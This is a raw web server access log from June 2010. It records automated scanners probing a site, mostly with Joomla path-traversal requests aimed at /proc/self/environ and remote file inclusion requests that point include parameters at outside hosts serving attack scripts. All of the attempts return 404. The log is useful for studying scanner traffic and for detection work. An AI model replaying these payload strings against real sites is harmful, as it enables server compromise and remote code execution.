75.125.254.98 - - [23/Jun/2010:00:00:00 -0400] "GET //index.php?option=com_properties&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 208 "-" "libwww-perl/5.834"
205.234.231.180 - - [23/Jun/2010:00:00:01 -0400] "GET /logs/access_log.Q110042700//index.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 235 "-" "libwww-perl/5.831"
205.234.231.180 - - [23/Jun/2010:00:00:01 -0400] "GET //index.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 208 "-" "libwww-perl/5.831"
205.234.231.180 - - [23/Jun/2010:00:00:01 -0400] "GET /logs//index.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 213 "-" "libwww-perl/5.831"
94.247.178.153 - - [23/Jun/2010:00:00:06 -0400] "GET /index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 207 "-" "libwww-perl/5.805"
201.36.173.93 - - [23/Jun/2010:00:00:14 -0400] "GET /index.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 207 "-" "libwww-perl/5.831"
189.108.172.26 - - [23/Jun/2010:00:00:17 -0400] "GET /logs/access_log.Q109061100%20%20/index.php?DOCUMENT_ROOT=http://www.tbcslough.org.uk/libraries/tcpdf/id1.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
114.108.128.56 - - [23/Jun/2010:00:00:23 -0400] "GET /logs/access_log.Q110010400///components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://pinoydeal.ph/log/.log? HTTP/1.1" 404 270 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511"
174.142.68.199 - - [23/Jun/2010:00:00:27 -0400] "GET /logs/access_log.Q110061100/index.php?option=com_awiki&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 234 "-" "libwww-perl/5.810"
174.142.68.199 - - [23/Jun/2010:00:00:28 -0400] "GET /index.php?option=com_awiki&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 207 "-" "libwww-perl/5.810"
174.142.68.199 - - [23/Jun/2010:00:00:28 -0400] "GET /logs/index.php?option=com_awiki&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 212 "-" "libwww-perl/5.810"
114.108.128.56 - - [23/Jun/2010:00:00:31 -0400] "GET /logs/error_log.Q109111600///components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://pinoydeal.ph/log/.log? HTTP/1.1" 404 269 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511"
121.88.4.74 - - [23/Jun/2010:00:00:37 -0400] "GET //xmlrpc.php HTTP/1.1" 404 209 "-" "libwww-perl/5.79"
121.88.4.74 - - [23/Jun/2010:00:00:41 -0400] "GET //xmlrpc.php HTTP/1.1" 404 209 "-" "libwww-perl/5.79"
202.160.123.72 - - [23/Jun/2010:00:01:04 -0400] "GET //xmlrpc.php HTTP/1.1" 404 209 "-" "libwww-perl/5.805"
217.31.58.188 - - [23/Jun/2010:00:01:07 -0400] "GET /logs/access_log.Q110052400/index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 234 "-" "libwww-perl/5.805"
217.31.58.188 - - [23/Jun/2010:00:01:07 -0400] "GET /index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 207 "-" "libwww-perl/5.805"
217.31.58.188 - - [23/Jun/2010:00:01:08 -0400] "GET /logs/index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 212 "-" "libwww-perl/5.805"
217.31.58.188 - - [23/Jun/2010:00:01:09 -0400] "GET /logs/access_log.Q110052600/index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 234 "-" "libwww-perl/5.805"
174.121.217.109 - - [23/Jun/2010:00:01:30 -0400] "GET //index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 209 "-" "libwww-perl/5.810"
95.108.245.251 - - [23/Jun/2010:00:01:41 -0400] "GET /logs/access_log.Q109090700 HTTP/1.1" 304 - "-" "Yandex/1.01.001 (compatible; Win16; I)"
205.234.231.180 - - [23/Jun/2010:00:01:43 -0400] "GET //index.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 208 "-" "libwww-perl/5.831"
174.142.68.199 - - [23/Jun/2010:00:01:47 -0400] "GET /logs/access_log.Q110061300/index.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 234 "-" "libwww-perl/5.810"
174.142.68.199 - - [23/Jun/2010:00:01:47 -0400] "GET /index.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 207 "-" "libwww-perl/5.810"
174.142.68.199 - - [23/Jun/2010:00:01:47 -0400] "GET /logs/index.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 212 "-" "libwww-perl/5.810"
174.121.216.99 - - [23/Jun/2010:00:01:50 -0400] "GET //index.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 208 "-" "libwww-perl/5.810"
174.121.217.109 - - [23/Jun/2010:00:01:53 -0400] "GET //index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 208 "-" "libwww-perl/5.810"
174.121.216.99 - - [23/Jun/2010:00:01:53 -0400] "GET //index.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 208 "-" "libwww-perl/5.810"
174.121.216.99 - - [23/Jun/2010:00:01:57 -0400] "GET //index.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 208 "-" "libwww-perl/5.810"
83.137.193.53 - - [23/Jun/2010:00:02:07 -0400] "GET /logs/access_log.Q110061100/index.php?option=com_awiki&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 234 "-" "libwww-perl/5.808"
83.137.193.53 - - [23/Jun/2010:00:02:07 -0400] "GET /index.php?option=com_awiki&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 207 "-" "libwww-perl/5.808"
83.137.193.53 - - [23/Jun/2010:00:02:07 -0400] "GET /logs/index.php?option=com_awiki&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 212 "-" "libwww-perl/5.808"
200.234.200.72 - - [23/Jun/2010:00:02:09 -0400] "GET /logs/access_log.Q109053100//home.php?pag=http://pinoydeal.ph/log/.log? HTTP/1.1" 404 234 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6"
200.234.200.72 - - [23/Jun/2010:00:02:09 -0400] "GET //home.php?pag=http://pinoydeal.ph/log/.log? HTTP/1.1" 404 207 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6"
83.137.193.53 - - [23/Jun/2010:00:02:09 -0400] "GET /logs/access_log.Q110061300/index.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 234 "-" "libwww-perl/5.808"
200.234.200.72 - - [23/Jun/2010:00:02:09 -0400] "GET /logs//home.php?pag=http://pinoydeal.ph/log/.log? HTTP/1.1" 404 212 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6"
83.137.193.53 - - [23/Jun/2010:00:02:09 -0400] "GET /index.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 207 "-" "libwww-perl/5.808"
83.137.193.53 - - [23/Jun/2010:00:02:09 -0400] "GET /logs/index.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 212 "-" "libwww-perl/5.808"
83.137.193.53 - - [23/Jun/2010:00:02:15 -0400] "GET /logs/access_log.Q110061200/index.php?option=com_awiki&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 234 "-" "libwww-perl/5.808"
60.234.132.61 - - [23/Jun/2010:00:02:23 -0400] "GET /index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 207 "-" "libwww-perl/5.831"
75.125.254.98 - - [23/Jun/2010:00:02:29 -0400] "GET /logs/access_log.Q110060700//index2.php?option=com_properties&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 236 "-" "libwww-perl/5.834"
75.125.254.98 - - [23/Jun/2010:00:02:29 -0400] "GET //index2.php?option=com_properties&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 209 "-" "libwww-perl/5.834"
75.125.254.98 - - [23/Jun/2010:00:02:29 -0400] "GET /logs//index2.php?option=com_properties&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 214 "-" "libwww-perl/5.834"
66.249.71.206 - - [23/Jun/2010:00:02:49 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+LM238CA6F0EE48500C5AC081+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
217.31.58.188 - - [23/Jun/2010:00:02:49 -0400] "GET /logs/access_log.Q110052400/index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 234 "-" "libwww-perl/5.805"
217.31.58.188 - - [23/Jun/2010:00:02:49 -0400] "GET /index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 207 "-" "libwww-perl/5.805"
217.31.58.188 - - [23/Jun/2010:00:02:49 -0400] "GET /logs/index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 212 "-" "libwww-perl/5.805"
217.31.58.188 - - [23/Jun/2010:00:02:51 -0400] "GET /logs/access_log.Q110052600/index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 234 "-" "libwww-perl/5.805"
83.137.193.53 - - [23/Jun/2010:00:03:05 -0400] "GET /logs/error_log.Q110061300/index.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 233 "-" "libwww-perl/5.808"
174.142.68.199 - - [23/Jun/2010:00:03:07 -0400] "GET /logs/error_log.Q110061300/index.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 233 "-" "libwww-perl/5.810"
201.36.173.93 - - [23/Jun/2010:00:03:31 -0400] "GET /logs/error_log.Q110053000/index.php?option=com_awiki&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 233 "-" "libwww-perl/5.831"
201.36.173.93 - - [23/Jun/2010:00:03:31 -0400] "GET /index.php?option=com_awiki&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 207 "-" "libwww-perl/5.831"
201.36.173.93 - - [23/Jun/2010:00:03:32 -0400] "GET /logs/index.php?option=com_awiki&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 212 "-" "libwww-perl/5.831"
94.198.96.3 - - [23/Jun/2010:00:03:41 -0400] "GET /logs/access_log.Q110052400/index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 234 "-" "libwww-perl/5.816"
94.198.96.3 - - [23/Jun/2010:00:03:42 -0400] "GET /index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 207 "-" "libwww-perl/5.816"
94.198.96.3 - - [23/Jun/2010:00:03:42 -0400] "GET /logs/index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 212 "-" "libwww-perl/5.816"
174.142.68.199 - - [23/Jun/2010:00:03:44 -0400] "GET /logs/access_log.Q110061300/index.php?option=com_awiki&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 234 "-" "libwww-perl/5.810"
94.198.96.3 - - [23/Jun/2010:00:03:44 -0400] "GET /logs/access_log.Q110052600/index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 234 "-" "libwww-perl/5.816"
83.137.193.53 - - [23/Jun/2010:00:03:46 -0400] "GET /logs/access_log.Q110061300/index.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 234 "-" "libwww-perl/5.808"
83.137.193.53 - - [23/Jun/2010:00:03:47 -0400] "GET /index.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 207 "-" "libwww-perl/5.808"
83.137.193.53 - - [23/Jun/2010:00:03:47 -0400] "GET /logs/index.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 212 "-" "libwww-perl/5.808"
209.59.12.99 - - [23/Jun/2010:00:03:50 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
75.125.254.98 - - [23/Jun/2010:00:04:14 -0400] "GET /logs/access_log.Q110061300//index2.php?option=com_properties&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 236 "-" "libwww-perl/5.834"
66.249.71.206 - - [23/Jun/2010:00:04:21 -0400] "GET /cgi-bin/LANSAWEB?PROCFUN+WORDPR01+FULLIMG+M37+FUNCPARMS+WEBCMP(S0020):1+WEBSSN(A0240):LD28B596F6EB2620099DA04V+WSEQ(S0060):1+OUITEM(A0200):05560000 HTTP/1.1" 200 27013 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.71.73 - - [23/Jun/2010:00:04:28 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+LC216E65E2D49380057D605G+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
75.125.254.98 - - [23/Jun/2010:00:04:43 -0400] "GET /logs/access_log.Q110060700//index.php?option=com_properties&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 235 "-" "libwww-perl/5.834"
75.125.254.98 - - [23/Jun/2010:00:04:43 -0400] "GET //index.php?option=com_properties&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 208 "-" "libwww-perl/5.834"
75.125.254.98 - - [23/Jun/2010:00:04:43 -0400] "GET /logs//index.php?option=com_properties&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 213 "-" "libwww-perl/5.834"
83.137.193.53 - - [23/Jun/2010:00:04:47 -0400] "GET /logs/error_log.Q110061300/index.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 233 "-" "libwww-perl/5.808"
209.59.202.38 - - [23/Jun/2010:00:04:55 -0400] "GET /logs//modules/My_eGallery/public/displayCategory.php?basepath=http://www.lagrassroots.net//concrete/data/usill-id.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4"
209.59.202.38 - - [23/Jun/2010:00:04:55 -0400] "GET /logs/access_log.Q110042400//modules/My_eGallery/public/displayCategory.php?basepath=http://www.lagrassroots.net//concrete/data/usill-id.txt?? HTTP/1.1" 404 272 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4"
209.59.202.38 - - [23/Jun/2010:00:04:55 -0400] "GET /logs/access_log.Q109121200//modules/My_eGallery/public/displayCategory.php?basepath=http://www.lagrassroots.net//concrete/data/usill-id.txt?? HTTP/1.1" 404 272 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4"
209.59.202.38 - - [23/Jun/2010:00:04:55 -0400] "GET //modules/My_eGallery/public/displayCategory.php?basepath=http://www.lagrassroots.net//concrete/data/usill-id.txt?? HTTP/1.1" 404 245 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4"
209.59.202.38 - - [23/Jun/2010:00:04:57 -0400] "GET /logs/access_log.Q110042400//modules/My_eGallery/public/displayCategory.php?basepath=http://www.lagrassroots.net//concrete/data/usill-id.txt?? HTTP/1.1" 404 272 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5"
209.59.202.38 - - [23/Jun/2010:00:04:57 -0400] "GET /logs//modules/My_eGallery/public/displayCategory.php?basepath=http://www.lagrassroots.net//concrete/data/usill-id.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5"
209.59.202.38 - - [23/Jun/2010:00:04:57 -0400] "GET //modules/My_eGallery/public/displayCategory.php?basepath=http://www.lagrassroots.net//concrete/data/usill-id.txt?? HTTP/1.1" 404 245 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5"
209.59.202.38 - - [23/Jun/2010:00:04:57 -0400] "GET /logs/access_log.Q109121200//modules/My_eGallery/public/displayCategory.php?basepath=http://www.lagrassroots.net//concrete/data/usill-id.txt?? HTTP/1.1" 404 272 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5"
209.59.202.38 - - [23/Jun/2010:00:05:17 -0400] "GET /logs/error_log.Q109121200//modules/My_eGallery/public/displayCategory.php?basepath=http://www.lagrassroots.net//concrete/data/usill-id.txt?? HTTP/1.1" 404 271 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4"
209.59.202.38 - - [23/Jun/2010:00:05:18 -0400] "GET /logs/error_log.Q109121200//modules/My_eGallery/public/displayCategory.php?basepath=http://www.lagrassroots.net//concrete/data/usill-id.txt?? HTTP/1.1" 404 271 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5"
209.59.202.38 - - [23/Jun/2010:00:05:20 -0400] "GET /logs/error_log.Q110042400//modules/My_eGallery/public/displayCategory.php?basepath=http://www.lagrassroots.net//concrete/data/usill-id.txt?? HTTP/1.1" 404 271 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4"
209.59.202.38 - - [23/Jun/2010:00:05:21 -0400] "GET /logs/error_log.Q110042400//modules/My_eGallery/public/displayCategory.php?basepath=http://www.lagrassroots.net//concrete/data/usill-id.txt?? HTTP/1.1" 404 271 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5"
209.59.202.38 - - [23/Jun/2010:00:05:44 -0400] "GET /logs/error_log.Q109072300//modules/My_eGallery/public/displayCategory.php?basepath=http://www.lagrassroots.net//concrete/data/usill-id.txt?? HTTP/1.1" 404 271 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4"
209.59.202.38 - - [23/Jun/2010:00:05:44 -0400] "GET /logs/error_log.Q109072300//modules/My_eGallery/public/displayCategory.php?basepath=http://www.lagrassroots.net//concrete/data/usill-id.txt?? HTTP/1.1" 404 271 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5"
67.195.114.223 - - [23/Jun/2010:00:05:29 -0400] "GET /logs/error_log.Q109061500 HTTP/1.0" 200 2959056 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
209.59.202.38 - - [23/Jun/2010:00:06:04 -0400] "GET /logs/access_log.Q109072300//modules/My_eGallery/public/displayCategory.php?basepath=http://www.lagrassroots.net//concrete/data/usill-id.txt?? HTTP/1.1" 404 272 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4"
174.121.217.109 - - [23/Jun/2010:00:06:06 -0400] "GET /logs/access_log.Q110060700//index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 236 "-" "libwww-perl/5.810"
174.121.217.109 - - [23/Jun/2010:00:06:06 -0400] "GET //index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 209 "-" "libwww-perl/5.810"
174.121.217.109 - - [23/Jun/2010:00:06:07 -0400] "GET /logs//index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 214 "-" "libwww-perl/5.810"
209.59.202.38 - - [23/Jun/2010:00:06:07 -0400] "GET /logs/access_log.Q109102200//modules/My_eGallery/public/displayCategory.php?basepath=http://www.lagrassroots.net//concrete/data/usill-id.txt?? HTTP/1.1" 404 272 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4"
209.59.202.38 - - [23/Jun/2010:00:06:08 -0400] "GET /logs/access_log.Q109072300//modules/My_eGallery/public/displayCategory.php?basepath=http://www.lagrassroots.net//concrete/data/usill-id.txt?? HTTP/1.1" 404 272 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5"
209.59.202.38 - - [23/Jun/2010:00:06:12 -0400] "GET /logs/access_log.Q109102200//modules/My_eGallery/public/displayCategory.php?basepath=http://www.lagrassroots.net//concrete/data/usill-id.txt?? HTTP/1.1" 404 272 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5"
75.125.254.98 - - [23/Jun/2010:00:06:15 -0400] "GET /logs/access_log.Q110061300//index.php?option=com_properties&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 235 "-" "libwww-perl/5.834"
67.195.114.223 - - [23/Jun/2010:00:06:14 -0400] "GET /logs/access_log.Q109081500 HTTP/1.0" 200 3060423 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
209.59.202.38 - - [23/Jun/2010:00:06:53 -0400] "GET /logs/access_log.Q109111200//modules/My_eGallery/public/displayCategory.php?basepath=http://www.lagrassroots.net//concrete/data/usill-id.txt?? HTTP/1.1" 404 272 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4"
209.59.202.38 - - [23/Jun/2010:00:06:56 -0400] "GET /logs/error_log.Q109102200//modules/My_eGallery/public/displayCategory.php?basepath=http://www.lagrassroots.net//concrete/data/usill-id.txt?? HTTP/1.1" 404 271 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4"
60.234.132.61 - - [23/Jun/2010:00:06:57 -0400] "GET /index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 207 "-" "libwww-perl/5.831"
209.59.202.38 - - [23/Jun/2010:00:06:58 -0400] "GET /logs/error_log.Q109102200//modules/My_eGallery/public/displayCategory.php?basepath=http://www.lagrassroots.net//concrete/data/usill-id.txt?? HTTP/1.1" 404 271 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5"
209.59.202.38 - - [23/Jun/2010:00:06:58 -0400] "GET /logs/access_log.Q109111200//modules/My_eGallery/public/displayCategory.php?basepath=http://www.lagrassroots.net//concrete/data/usill-id.txt?? HTTP/1.1" 404 272 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5"
209.59.202.38 - - [23/Jun/2010:00:07:09 -0400] "GET /logs/access_log.Q109051100//modules/My_eGallery/public/displayCategory.php?basepath=http://www.lagrassroots.net//concrete/data/usill-id.txt?? HTTP/1.1" 404 272 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4"
209.59.202.38 - - [23/Jun/2010:00:07:11 -0400] "GET /logs/access_log.Q109052500//modules/My_eGallery/public/displayCategory.php?basepath=http://www.lagrassroots.net//concrete/data/usill-id.txt?? HTTP/1.1" 404 272 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4"
209.59.202.38 - - [23/Jun/2010:00:07:14 -0400] "GET /logs/access_log.Q109061700//modules/My_eGallery/public/displayCategory.php?basepath=http://www.lagrassroots.net//concrete/data/usill-id.txt?? HTTP/1.1" 404 272 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4"
209.59.202.38 - - [23/Jun/2010:00:07:14 -0400] "GET /logs/access_log.Q109051100//modules/My_eGallery/public/displayCategory.php?basepath=http://www.lagrassroots.net//concrete/data/usill-id.txt?? HTTP/1.1" 404 272 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5"
209.59.202.38 - - [23/Jun/2010:00:07:14 -0400] "GET /logs/access_log.Q109052500//modules/My_eGallery/public/displayCategory.php?basepath=http://www.lagrassroots.net//concrete/data/usill-id.txt?? HTTP/1.1" 404 272 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5"
209.59.202.38 - - [23/Jun/2010:00:07:19 -0400] "GET /logs/access_log.Q109061700//modules/My_eGallery/public/displayCategory.php?basepath=http://www.lagrassroots.net//concrete/data/usill-id.txt?? HTTP/1.1" 404 272 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5"
209.59.202.38 - - [23/Jun/2010:00:07:22 -0400] "GET /logs/error_log.Q109061700//modules/My_eGallery/public/displayCategory.php?basepath=http://www.lagrassroots.net//concrete/data/usill-id.txt?? HTTP/1.1" 404 271 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4"
209.59.202.38 - - [23/Jun/2010:00:07:25 -0400] "GET /logs/error_log.Q109061700//modules/My_eGallery/public/displayCategory.php?basepath=http://www.lagrassroots.net//concrete/data/usill-id.txt?? HTTP/1.1" 404 271 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5"
209.59.202.38 - - [23/Jun/2010:00:07:52 -0400] "GET /logs/access_log.Q109052100//modules/My_eGallery/public/displayCategory.php?basepath=http://www.lagrassroots.net//concrete/data/usill-id.txt?? HTTP/1.1" 404 272 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4"
209.59.202.38 - - [23/Jun/2010:00:07:54 -0400] "GET /logs/access_log.Q109052100//modules/My_eGallery/public/displayCategory.php?basepath=http://www.lagrassroots.net//concrete/data/usill-id.txt?? HTTP/1.1" 404 272 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5"
209.59.202.38 - - [23/Jun/2010:00:07:55 -0400] "GET /logs/error_log.Q110011300//modules/My_eGallery/public/displayCategory.php?basepath=http://www.lagrassroots.net//concrete/data/usill-id.txt?? HTTP/1.1" 404 271 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4"
209.59.202.38 - - [23/Jun/2010:00:07:55 -0400] "GET /logs/error_log.Q109052200//modules/My_eGallery/public/displayCategory.php?basepath=http://www.lagrassroots.net//concrete/data/usill-id.txt?? HTTP/1.1" 404 271 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4"
209.59.202.38 - - [23/Jun/2010:00:07:57 -0400] "GET /logs/error_log.Q109052200//modules/My_eGallery/public/displayCategory.php?basepath=http://www.lagrassroots.net//concrete/data/usill-id.txt?? HTTP/1.1" 404 271 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5"
209.59.202.38 - - [23/Jun/2010:00:07:58 -0400] "GET /logs/error_log.Q110011300//modules/My_eGallery/public/displayCategory.php?basepath=http://www.lagrassroots.net//concrete/data/usill-id.txt?? HTTP/1.1" 404 271 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5"
